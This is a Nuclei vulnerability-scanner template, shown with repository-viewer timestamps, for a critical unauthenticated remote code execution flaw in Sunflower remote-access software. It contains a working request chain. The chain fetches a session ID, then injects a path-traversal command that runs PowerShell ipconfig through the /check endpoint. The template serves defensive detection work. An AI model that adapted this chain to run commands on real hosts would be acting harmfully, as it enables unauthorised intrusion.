nuclei-templates/cnvd/2022/CNVD-2022-03672.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2022-02-22 23:30:18 +00:00
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal - Remote Code Execution
2022-02-22 23:30:18 +00:00
author: daffainfo
severity: critical
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
2022-02-22 23:30:18 +00:00
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
2022-02-28 20:34:49 +00:00
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2022-02-28 20:34:49 +00:00
tags: cnvd,cnvd2020,sunflower,rce
2022-02-22 23:30:18 +00:00
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
2022-02-24 19:01:56 +00:00
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
2022-02-22 23:30:18 +00:00
Host: {{Hostname}}
Cookie: CID={{cid}}
2022-02-23 08:40:26 +00:00
extractors:
2022-02-22 23:30:18 +00:00
- type: regex
name: cid
2022-02-28 20:34:49 +00:00
internal: true
2022-02-22 23:30:18 +00:00
group: 1
2022-02-23 08:40:26 +00:00
regex:
2022-02-28 20:34:49 +00:00
- '"verify_string":"(.*)"'
2022-02-22 23:30:18 +00:00
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
2022-02-23 08:40:26 +00:00
- "contains(body_1, 'verify_string')"
2022-02-22 23:30:18 +00:00
- "contains(body_2, 'Windows IP')"
2022-02-28 20:34:49 +00:00
condition: and
# Enhanced by mp on 2022/05/12